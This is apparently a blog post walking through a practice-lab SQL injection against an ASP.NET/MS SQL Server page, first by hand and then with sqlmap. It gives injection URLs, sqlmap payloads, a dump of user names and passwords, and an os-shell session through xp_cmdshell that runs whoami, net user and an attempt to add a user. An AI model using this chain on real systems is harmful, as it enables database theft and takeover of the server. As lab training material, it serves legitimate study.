首页 > 数据库 >5号黯区WEB靶场-注入漏洞-sql server get注入(sa)

5号黯区WEB靶场-注入漏洞-sql server get注入(sa)

时间:2022-12-29 17:00:41浏览次数:44  
标签:sqlmap WEB get 8201 CHAR aspx id 注入

1 手工注入

1、判断是否有注入。

加单引号发现有报错,存在报错注入。

http://bug.cc:8201/get.aspx?id=1'

 and 1=1显示正常, and 1=2不显示数据,存在布尔型注入。

http://bug.cc:8201/get.aspx?id=1 and 1=1

加/显示正常,加-0显示错误。

2、判断数据库类型,显示正常代表为mssql(即sqlserver)。 and (select count(*) from sysobjects)>0 

http://bug.cc:8201/get.aspx?id=1 and (select count(*) from sysobjects)>0 

3、判断字段个数,order by 4,通过尝试发现有4个字段。

http://bug.cc:8201/get.aspx?id=1 order by 4

4、

 

2 工具注入

2.1 sqlmap

过程如下:

1、测试注入点:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1'

2、获取当前数据库:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-db

3、获取当前用户:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-user

4、判断管理员权限:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --is-dba

5、获取数据库表:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test --tables

6、获取数据库表的列:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users --columns

7、获取数据库数据:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users -C name,password --dump

8、执行命令:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell

 

1、测试注入点:sqlmap -u "http://192.168.5.186:8201/get.aspx?id=1"

结果如下:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9842=9842

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: id=1 WAITFOR DELAY '0:0:5'

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(119)+CHAR(122)+CHAR(109)+CHAR(83)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(111)+CHAR(99)+CHAR(71)+CHAR(121)+CHAR(79)+CHAR(90)+CHAR(65)+CHAR(87)+CHAR(89)+CHAR(102)+CHAR(82)+CHAR(83)+CHAR(120)+CHAR(99)+CHAR(65)+CHAR(104)+CHAR(119)+CHAR(82)+CHAR(107)+CHAR(82)+CHAR(112)+CHAR(120)+CHAR(68)+CHAR(68)+CHAR(97)+CHAR(97)+CHAR(81)+CHAR(112)+CHAR(88)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL-- ouYA
---
[03:08:54] [INFO] testing Microsoft SQL Server
[03:08:55] [INFO] confirming Microsoft SQL Server
[03:08:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 7 or 2008 R2
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

2、获取当前数据库:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-db

current database: 'test'

3、获取当前用户:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-user

current user: 'sa'

4、判断管理员权限:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --is-dba

current user is DBA: True

5、获取数据库表:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test --tables

Database: test
[3 tables]
+--------------+
| cmd |
| sqlmapoutput |
| users |
+--------------+

6、获取数据库表的列:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users --columns

Database: test
Table: users
[4 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| age | int |
| id | int |
| name | varchar |
| password | varchar |
+----------+---------+

7、获取数据库数据:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users -C name,password --dump

Database: test
Table: users
[2 entries]
+--------+----------+
| name | password |
+--------+----------+
| admin1 | admin2 |
| admin2 | admin2 |
+--------+----------+

8、执行命令:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell

└─# sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:21:03 /2022-12-29/

[03:21:03] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:21:03] [INFO] testing connection to the target URL
[03:21:04] [INFO] heuristics detected web page charset 'utf-8'
[03:21:04] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9842=9842

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: id=1 WAITFOR DELAY '0:0:5'

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(119)+CHAR(122)+CHAR(109)+CHAR(83)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(111)+CHAR(99)+CHAR(71)+CHAR(121)+CHAR(79)+CHAR(90)+CHAR(65)+CHAR(87)+CHAR(89)+CHAR(102)+CHAR(82)+CHAR(83)+CHAR(120)+CHAR(99)+CHAR(65)+CHAR(104)+CHAR(119)+CHAR(82)+CHAR(107)+CHAR(82)+CHAR(112)+CHAR(120)+CHAR(68)+CHAR(68)+CHAR(97)+CHAR(97)+CHAR(81)+CHAR(112)+CHAR(88)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL-- ouYA
---
[03:21:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[03:21:04] [WARNING] reflective value(s) found and filtering out
[03:21:04] [INFO] testing if current user is DBA
[03:21:04] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[03:21:13] [INFO] xp_cmdshell extended procedure is available
[03:21:13] [INFO] testing if xp_cmdshell extended procedure is usable
[03:21:13] [INFO] xp_cmdshell extended procedure is usable
[03:21:13] [INFO] going to use extended procedure 'xp_cmdshell' for operating system command execution
[03:21:13] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'nt authority\network service'
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest
命令运行完毕,但发生一个或多个错误。

---
os-shell> net user test 123.com /add
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
发生系统错误 5。

拒绝访问。

---
os-shell>

 

标签:sqlmap,WEB,get,8201,CHAR,aspx,id,注入
From: https://www.cnblogs.com/snow2021/p/17012997.html

相关文章

  • python字典中dict.get()和dict.setdefault()的异同点
    1.相同点:两者是参数相同:dict.get(key,default=None),dict.setdefault(key,default=None)如果指定的键不存在时,两者都返回默认值,默认是None如果指定的键存在时,即使......
  • Web前端学习笔记2——表格
    表格的基本语法以及标签表格示例1:table标签就是表格的标签,用来建立一个表格tr标签表示行,一个<tr></tr>标签就是一行td标签表示数据单元格的内容,可以理解为列th标签为......
  • .Net6 WebApi使用SqlSugar
    1、Nuget先引入:SqlSugarCore2、NetIOC1、注入ISqlSugarClient.NET自带的IOC使用也很方便 先封装一个操作类  //建一个扩展类publicstaticclassSqlsugarS......
  • vue websockt 实现站内消息的发送和接收
    1.什么是 WebSocketwebsocket是HTML5开始提供的一种网络通信协议,它的目的是在浏览器之间建立一个不受限的双方通信的通道,比如说,服务器可以在任意时刻发送信息给浏览器。......
  • Mac——Mac 安装apt-get
    MAC系统版本:10.13和Linux系统不同的是,Mac系统默认是不带有apt-get软件包工具的,所以要想在Mac上使用上方便的apt-get就需要自己来安装它。一、安装fink使用apt-get首先......
  • windows 启动exe程序前注入dll(c++)
    //需要的头文件:#include<iostream>#include<stdarg.h>#include<Windows.h>#include<Psapi.h>#include<stdint.h>#include<tlhelp32.h>#include<imagehlp.h>#pragmac......
  • MyBatis修改操作注入动态全局参数
    有时候我们在更新字段的时候可能只更新一个状态,但是又需要记录当前的更新人和更新时间,比如:updateStatus(@Param("id")Stringid,@Param("status")Integerstatus);这......
  • Web技术的发展 网络发展简介(三)
    即使你精通js,但是却不知道为什么有js的话,人生岂不是有点缺憾?天天开发web项目,却不了解点历史,是否也会有点失落?本文从web的最初发明的历史开始,对web的发展......
  • Ajax提交GET后台处理
    <?phpheader("Content-type:text/html;charset=utf-8");//登录一般都是get请求所以我们这里使用一个变量接受所以get请求$data=$_GET;//吧所有获取的参数赋值......
  • Getting Started with Spring Cloud Stream 入门
    这篇文章是与BenWilcock共同撰写的,他是SpringatPivotal的产品和技术营销经理。......